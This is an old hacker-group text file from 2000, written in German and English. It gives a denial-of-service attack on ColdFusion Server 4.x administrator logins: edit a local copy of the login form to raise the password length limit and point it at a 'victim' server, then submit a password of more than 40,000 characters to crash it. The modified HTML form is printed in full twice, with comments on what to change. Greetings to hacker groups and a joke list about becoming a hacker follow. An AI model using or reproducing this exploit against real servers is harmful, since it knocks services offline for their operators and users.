GitS - NETWORK austria
				    proudly presents                                    
	               .-°°-..-°°-.:- Hackers r us! -:.-°°-..-°°-.
                                       
                                 #####################
                                 #      addon 1      # 
                                 #" poor DOS Attack "#
                                 #        or         #
                                 #"  it's that good  #
                                 #      to be evil  "#
                                 #####################      
                                        
                                         by 
                                   -fallen-angel-
                                 (multipersonality)

                                   (20. 10. 2000)
                  ~ tested on 2 diffrent CF-Server 4.5.X and WINNT ~
             


.-°°-.:^:.-°°-.
.    INDEX    .
---------------

1   A Hacker
2.1 poor DOS attack (german)
2.2 poor DOS attack (english)

3. Greetings and thanx

(including source codes)


-----------------------------------------
*****************************************
* #   #   ##     #### #  # ##### ###### *
* #   #  #  #  #      # #  #     #    # *
* ##### ###### #      ##   ####  ###### *
* #   # #    # #      # #  #     # #    *
* #   # #    #  ##### #  # ##### #  ### *
*****************************************
-----------------------------------------

wir wird man ein hacker?

1. man schläft höchsten 3h am tag
2. man hat keine zeit für girls
3. ein hacker raucht dope
4. man sucht verzweifelt eine weibliche gleichgesinnte
5. naja man muss einige jahre exploits und bücher studieren, praxis dazugewinnen ...

thanx for listening to:
-fallen-angel- (project2501) GitS-Network

Der Preis der finsterniss geht dieses mal an:
       ------>>> hard pete <<<-------- 
            
Special thaaaaanx to my best friend since i was 4:
             <<<< SOLARIS >>>>

Special greetings to a special girl! 
       you know, who !!! *GG* 


*****************************
2.1 poor DOS attack (german)*
*****************************

Diese attacke wird über den Admin Login des CF servers durchgeführt... auf jedem CF server
hat man zugriff auf das file (www.host.com/cfide/administrator/index.html) das ist die 
admin loginseite des Admin eines CF serves. Wenn bei der passwortabfrage ein string von über
40,000 chars eingegeben wird, so schmiert dieser server ab. Nun haben wir aber das problem
das das password feld nur max. 100 zeichen zulässt. tja was machen?
wir gehen wie folg vor:
1. wir öffnen das file index.cfm auf unserer hd. (im verzeichniss cfide/administrator/) oder verwende den begefügten source code
2. wir ändern die max zugelassene anzahl von chars in dem pw feld auf über 40,001 
3. wir ändern den form action tag auf <FORM Action="http://www.opferserver.com/CFIDE/administrator/index.cfm" Method="POST" NAME="loginform">
   wir ändern den pw form tag auf <INPUT Name="PasswordProvided" Type="PASSWORD" Size="16" MAXLENGTH="40001">

<--- index.cfm ----> 
<---- start code ---->

		<HTML>
<HEAD>
	<TITLE>ColdFusion Administrator Login</TITLE>
</HEAD>

<body bgcolor="#99CC99" background="images/bgblue.gif" onload="document.forms.loginform.PasswordProvided.focus();">

<FORM Action="/CFIDE/administrator/index.cfm" Method="POST" NAME="loginform">
<!--- don't forget to change Action="/CFIDE/administrator/index.cfm" into Action="http://www.opferserver.com/CFIDE/administrator/index.cfm" --->

<center>
<table border=0 cellpadding=2 cellspacing=0 bgcolor="000066">
<tr>
	<td>
		<table border=0 cellpadding=0 cellspacing=0 bgcolor="white">
		<tr>
			<td width=50 nowrap>&nbsp;</td>
			<td height=100>
				<table border="0" cellspacing="0" cellpadding="0" width="275">
				<tr>
					<td colspan="2" align="right">
						<img src="images/allaire.gif" width=177 height=25 vspace=0 border=0><br>
					</td>
				</tr>
				<tr>
					<td colspan=2>
						<img src="images/coldfusion40.gif" width=400 height=106 border=0 vspace=25><br>
					</td>
				</tr>
				<tr>
					<td width="100" nowrap>&nbsp;</td>
					<td>
					<FONT SIZE="-1" FACE="arial, geneva, helvetica">
					
					
					<font face="arial, geneva, helvetica" size="2" color="666666">
					<P>
						<INPUT Name="PasswordProvided" Type="PASSWORD" Size="16" MAXLENGTH="100">
<!--- don't forget to change pw form tag max="100" into max="40001" --->
						<INPUT Name="PasswordProvided_required" Type="HIDDEN" Value="You must provide a password.">
						<INPUT Name="Submit" Type="SUBMIT" Value="Password"><br>
					</P>
					<p>
						In order to access the administrative functions
						on this ColdFusion server you need to login
						using the administrator password.  Accept cookies
						must be enabled for your browser.
					</FONT>
					</p>
					</td>
				</tr>
				</table><br>
				<br>
				<br>
			</td>
			<td rowspan=99><img src="images/bluecurve.gif" width=125 height=400 border=0></td>
		</tr>
		</table>
	</td>
</tr>
<tr>
	<td align="center">
	<font size="-2" face="arial, geneva, helvetica" color="white">
		Copyright 1998-2000, GitS-Network, AUSTRIA Change your mind!
	</font>
	</td>
</tr>
<tr><td></td></tr>
</table>
</FORM>
	
</BODY>
</HTML>


<---- end code ---->


Nun starten wir das oben aufgeführte template mit den abgeänderten tag's und geben dort ein
passwort ein das über 40,000 chars hat und loggen uns ein ... booom server ist down :)

Tested on CF enterprise SERVER:
 4.0.1 / 4.5.1 

OS:
WINNT SP6

i hatte leider nicht die möglichkeit es auf UniX zu testen... 
aber dürfte eigentlich kein problem sein 






******************************
2.1 poor DOS attack (english)*
******************************


We provide this dos attack over the admins login... you have access to 
(www.host.com/cfide/administrator/index.html) on each cf server.
if u enter into the password form-field a password over 40,000 chars the server will crash.
but the password form-field has had a limit to 100 chars. so what we've to do?
we've to change in the password filed the max. char limit from 100 to 40,0001 or higher

1. we are opening the index.cfm on our hd in dir (cfide/administrator/) or use the included source code.
2. we change the max. limit of the password field from 100 to 40,0001
   <INPUT Name="PasswordProvided" Type="PASSWORD" Size="16" MAXLENGTH="40001">
3. we chage the form action tag to <FORM Action="http://www.victimserver.com/CFIDE/administrator/index.cfm" Method="POST" NAME="loginform">

<--- index.html ----> 
<---- start code ---->
	<HTML>
<HEAD>
	<TITLE>ColdFusion Administrator Login</TITLE>
</HEAD>

<body bgcolor="#99CC99" background="images/bgblue.gif" onload="document.forms.loginform.PasswordProvided.focus();">

<FORM Action="/CFIDE/administrator/index.cfm" Method="POST" NAME="loginform">
<!--- don't forget to change Action="/CFIDE/administrator/index.cfm" into Action="http://www.opferserver.com/CFIDE/administrator/index.cfm" --->

<center>
<table border=0 cellpadding=2 cellspacing=0 bgcolor="000066">
<tr>
	<td>
		<table border=0 cellpadding=0 cellspacing=0 bgcolor="white">
		<tr>
			<td width=50 nowrap>&nbsp;</td>
			<td height=100>
				<table border="0" cellspacing="0" cellpadding="0" width="275">
				<tr>
					<td colspan="2" align="right">
						<img src="images/allaire.gif" width=177 height=25 vspace=0 border=0><br>
					</td>
				</tr>
				<tr>
					<td colspan=2>
						<img src="images/coldfusion40.gif" width=400 height=106 border=0 vspace=25><br>
					</td>
				</tr>
				<tr>
					<td width="100" nowrap>&nbsp;</td>
					<td>
					<FONT SIZE="-1" FACE="arial, geneva, helvetica">
					
					
					<font face="arial, geneva, helvetica" size="2" color="666666">
					<P>
						<INPUT Name="PasswordProvided" Type="PASSWORD" Size="16" MAXLENGTH="100">
<!--- don't forget to change pw form tag max="100" into max="40001" --->
						<INPUT Name="PasswordProvided_required" Type="HIDDEN" Value="You must provide a password.">
						<INPUT Name="Submit" Type="SUBMIT" Value="Password"><br>
					</P>
					<p>
						In order to access the administrative functions
						on this ColdFusion server you need to login
						using the administrator password.  Accept cookies
						must be enabled for your browser.
					</FONT>
					</p>
					</td>
				</tr>
				</table><br>
				<br>
				<br>
			</td>
			<td rowspan=99><img src="images/bluecurve.gif" width=125 height=400 border=0></td>
		</tr>
		</table>
	</td>
</tr>
<tr>
	<td align="center">
	<font size="-2" face="arial, geneva, helvetica" color="white">
		Copyright 1998-2000, GitS-Network, AUSTRIA Change your mind!
	</font>
	</td>
</tr>
<tr><td></td></tr>
</table>
</FORM>
	
</BODY>
</HTML>


<---- end code ---->

now we change the tags and start the upper source code.
we enter a password wich is higher than 40,000 chars and booom server is down :)

Tested on CF enterprise SERVER:
 4.0.1 / 4.5.1 

OS:
WINNT SP6

i do not have the possiblity to test it on a *nix server but i can't imagine why it won't work





++++++++++++++++++
+****************+
+* 3. greetings *+
+****************+
++++++++++++++++++

greetings to (groups):
euroarmy.org (irc channel #hackerattack, irc.dal.net, port:7000)
2600.com
MiLwOrm
L0pth
hackerattack.org , virusattack.org
scheiterhaufen.net, org, com
cyberarmy.com


special greetings to:
---------------------
massa mastur, hard pete, solaris, fantomas, frau post,sara, me and to our cat Herr Miggi


greetings to:
-------------
Helic, CHiCoSTo, cybermaXX, axall+, LordAidan, Eternal, [XpL]Raptor and all other euroarmy/gits-network members.


lovely greetings to:
--------------------
all hacker-girls, maybe there are some out !?¿



contact:
--------
-->> gits-network <<-- 
page:      www.gits-network.com
generell:  contact@gits-network.com
author:    fallen@gits-network.com



(C) copyleft by GitS-Network
written by -fallen-angel- (project2501) GitS-Network (euroarmy.org EOS member)


GITS - NETWORK --- AUSTRIA ---- CHANGE YOUR MIND!
.-°°-..-°°-.: fighting for freedom :..-°°-..-°°-.
    IF YOU WANNA HELP US, CONTACT US ... 

message to cyberarmy : 
looking out for .sushi servers sux ....